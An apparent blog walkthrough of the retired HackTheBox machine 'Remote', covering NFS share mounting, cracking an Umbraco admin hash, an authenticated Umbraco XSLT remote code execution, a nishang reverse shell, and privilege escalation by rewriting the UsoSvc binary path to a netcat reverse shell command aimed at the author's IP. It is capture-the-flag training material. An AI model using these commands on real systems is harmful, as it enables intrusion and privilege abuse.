Remote HackTheBox Walkthrough
Hello guys HackTheBox team has retired Remote meaning am allowed to release a wakthrough on how i solved the box. The box was a really fun for me and it showed the importance of doing recon properly. First you find a website running Umbraco CMS (Content Management System) and that specific version is vulnerable to an authenticated remote code execution vulnerability meaning for us to be able to exploit the vulnerability you need to have the correct credentials but we don't have any valid credentials. Some people might have gone down a rabbit hole of brute forcing the login page if they didn’t do enumeration correctly but if you did your enumeration correctly and did a full port scan you realized that an extra port was open and it was running NFS mount the share,do some magic and get credentials and use an exploit to get a shell on the box. Am going to be doing it manually using burpsuite and also we are going to twerk the exploit script a bit to make it have more functionality like seeing the command output. After getting a shell on the box you find we have write access to a service called USOSVC edit the service and get admin privileges on the box. It was a really fun box without much say let’s jump in
As always we are going to start of with a nmap scan of the box to find the services that are running
Looking at the nmap scan results we have a few ports open
First we see FTP has anonymous login allowed let’s what we can get off of it
Doing a directory listing we see that it really has nothing useful. Next i decided to enumerate HTTP. Opening the webpage using Mozilla we see a standard webpage and it appears to be a content management system
Scrolling through the webpages we see it an Umbraco instance i decided to click around and see if i could find anything meaningful and one thing stood out
The way a URL parameter was calling the webpages to be displayed
I decided to test for LFI(Local File Inclusion) but i didn’t get anything meaningful after a short time i decided to just keep it in my mind and if i get stuck i could revisit it again.
Next i decided to do a directory brute forcing using a gobuster and a targeted wordist found in seclists. Gobuster is a Directory/file & DNS busting tool written in Go it’s a tool used to brute-force URIs including directories and files as well as DNS subdomains
Looking at the result we see that we have few directories coming back so let’s take a look at one of them
/umbraco redirects us to a login page but we don’t have any credentials
Next i decided to try dump credentials for the login page such as:
1. admin@remote.htb:admin
2. admin@remote.htb:password
3. guest@remote.htb:guestBut always got a login failure
But going back to our nmap scan we see that SMB was enabled i decided to try and see if guest authentication was enabled using both smbclient and smbmap. These are tools in linux designed to interact with samba shares
But looking at the above screenshot i got authentication error. Now i had hit a dead end and i decided to do a full port and see if i might have missed anything
Looking at the full port result we see port 2049 is open which runs NFS
I decided to see what shares was accessible to us using the showmount command in Linux
Looking at the results we see that we have access to site_backups share since as you see it’s accessible to everyone
I decided to mount the share so that i could have a look at the files
first i made a directory called mount
Next i mounted the share using the command below
sudo mount -t nfs -o vers=2 10.10.10.180/site_backups $(pwd)/mount
Doing a directory listing we see all the files and it looks like the Umbraco CMS site backup. Sweet!!!!
Every user information is stored in the App_Data directory i decided to navigate to it since user information almost always include credentials
The file that really stood out to me was the umbraco.sdf file since it’s a database file i knew these by looking at umbraco forums
i decided to copy it to my box and then ran strings against it and i found really useful information. We have a bunch of emails. This is possible because the database is not encrypted
Looking at the above screenshot we see some couple of potentials emails
1. admin@htb.local
2. smith@htb.localAlso doing a head command on that same Umbraco.sdf file we see some string which looks like a sha1 hash
b8be16afba8c314ad33d812f22a04991b90e2aaa
So i decided to copy it to my local box and try seeing if i could crack the hash using hashcat
But first i tried to identify exactly what type hash it could possibly be by using hash-identifier i had made an educated guess it could be a sha1 hash since it was 40 character
Hash-identifier was able to identify it to be a sha1 hash and it’s mode 100 when we look at hashcat — example-hashes output
Let’s get cracking with hashcat
My Laptop specs are low but after about 30 sec the hash was cracked
As you see in the above image the password is
baconandcheeseNow we have one valid credentials
admin@htb.local:baconandcheeseLet’s go back to the login page of umbraco and see if we can login to the CMS
After filling in the details and clicking the login button
We get logged in immediately
My next instinct was to try and determine the exact version of umbraco running
Pressing the help button we get to see the exact version of umbarco running which is
Version: 7.12.4
Next i decided to do a searchsploit since i knew the box was centered around an exploit. Searchsploit is a database containing open source exploits for various softwares
Looking at the output of searchsploit we see that our exact version is vulnerable to an authenticated remote code execution vulnerability
So i copied the exploit to my working directory
Then i executed the script and got a bunch of errors
So i decided to debug the script which was easy in my opinion and got it to work
But we are not getting any output just a message saying start and end
But let’s try to explain the exploit a bit the xslt payload specifically
From the above screenshot you can see that proc.StartInfo.FileName will call the executable and the arguments you’ll pass the executable are defined in proc.StartInfo.Arguments. Sweet!!!
Now i decided to see if i could add a bit more spice to the exploit which would allow us to execute command from the terminal since this vulnerability is not a blind remote code execution vulnerability meaning we have output. The problem is the output of the command we ran is in between the noise. So i messed with the script a a bit more and the results are as you see below
As you can see above we can execute multiple command without us actually having to interact with the source code of the application Just imported regular expression module and it did the trick it filtered the noise out and returned only the output of the command we were running. Now we have a way to execute code on the system let’s get a shell on the box using nishang reverse shells
I copied nishang reverse shell to my current working directory
Then edited the IP address and port to connect to by adding the following one line at the bottom of the script
Next i hosted a simple HTTP Server this will allow the shell to be downloaded from our box then when executed it will give us a reverse shell
Next i did set up a netcat listener on port 9001. The same port we had specified on the power shell reverse shell
Next i executed the powershell command that would download the powershell reverse shell and also execute it
After executing the script going back to the server we see that the reverse shell had been downloaded
And going back to the netcat listener we had a shell on the box
Sweet now we are on the box.
Now let’s go back a little bit and get code execution using burpsuite since that’s how i did it the first time i did the box
First we have to login to the content management system(CMS) first
Next we have to navigate to the vulnerable URL
Next i clicked visualize XSLT and intercepted the request using burpsuite
Next i sent the request to the repeater tab
And i went back and analyzed the python exploit source code
The payload is defined in a variable meaning it is used somewhere else in the script
I continued analyzing the script
And found where the variable had been declared
The payload was used in a post parameter called
xsltSelection
Next i added the payload in the same spot in my repeater request
Looking at the payload it will call powershell.exe and then execute a ping command which will ping my box
Before executing the request i did set up a netcat listener
Then executed the script going back to my tcpdump listener you can see that i got a callback
And looking at the output of the request we see that the command output is also seen
This is what made me modify the script since i could get an output of the command
Now you can use the same method to get a shell on the box using burpsuite i just used ping as a proof of concept(POC)
But enough of that let’s get back to doing the box
We already got a shell
Going to users public folder we have the user.txt flag
Now you can submit it to HackTheBox to show you have completed the user challenge
Now we have to escalate to root on the box. I decided to run a script called powerUP which automatically checks for privilege escalation vectors
First I downloaded powerUP to the box
To execute the script i used the command
Invoke-AllChecks
I did let the program run till when it had finished and decided to go though the output
One information really stood out
We can start and stop Usosvc service and we can also edit the config files
And what’s even better is that powerUP was kind enough to give us a command to run this will allow us to escalate our privileges
On running the command we are given another command we are supposed to run
On running the command it will create a new user called john and the user will have admin privileges
But i opted against using this method of creating a new user on the box and decided to upload a netcat reverse shell to the box using the script i had customized
First i did set up a web server
Next i used Invoke-WebRequest a powershell one liner to download netcat on the box
Next i edited the service Usosvc. Actually this vulnerability is a CVE and PayloadAllTheThings gives a good article on how to exploit the service
After i had downloaded the netcat reverse shell i stopped the service first before editing it using the command
sc.exe stop UsoSvc
Next i edited the service and tricked it to think that the binary path for the program was the netcat reverse shell i had downloaded on the box
The command that i used was
sc.exe config usosvc binPath="C:\users\public\nc.exe 10.10.14.124 9001 -e cmd"
And as you can see from the above screenshot the service configuration has been changed successfully
Now i queried the service again to make sure that the changes had been implemented
As you can see the binary path has been changed successfully
Next i did set up a netcat listener using the same port i had specified in the Usosvc service config
Then i started the service again using the command
sc.exe start UsoSvc
And going back to my netcat listener we had a shell as administrator on the box
Navigating to the Desktop’s folder of administrator we have the root flag and we can view
And the box is pretty much done. That was fun and i actually like it since the scenario is somewhat realistic i also loved modifying the script
As i always say coding is FUN and with practice you get good at it
I haven’t really gone into details in exploit development part (how i modified the python script and the lines of code i added) but in the coming week i might be releasing a 3 minute writeup on how i modified the script but that’s it for now folks till next time it’s goodbye
If you liked the walkthrough you can clap for me down below and follow me so that you don’t miss any upcoming articles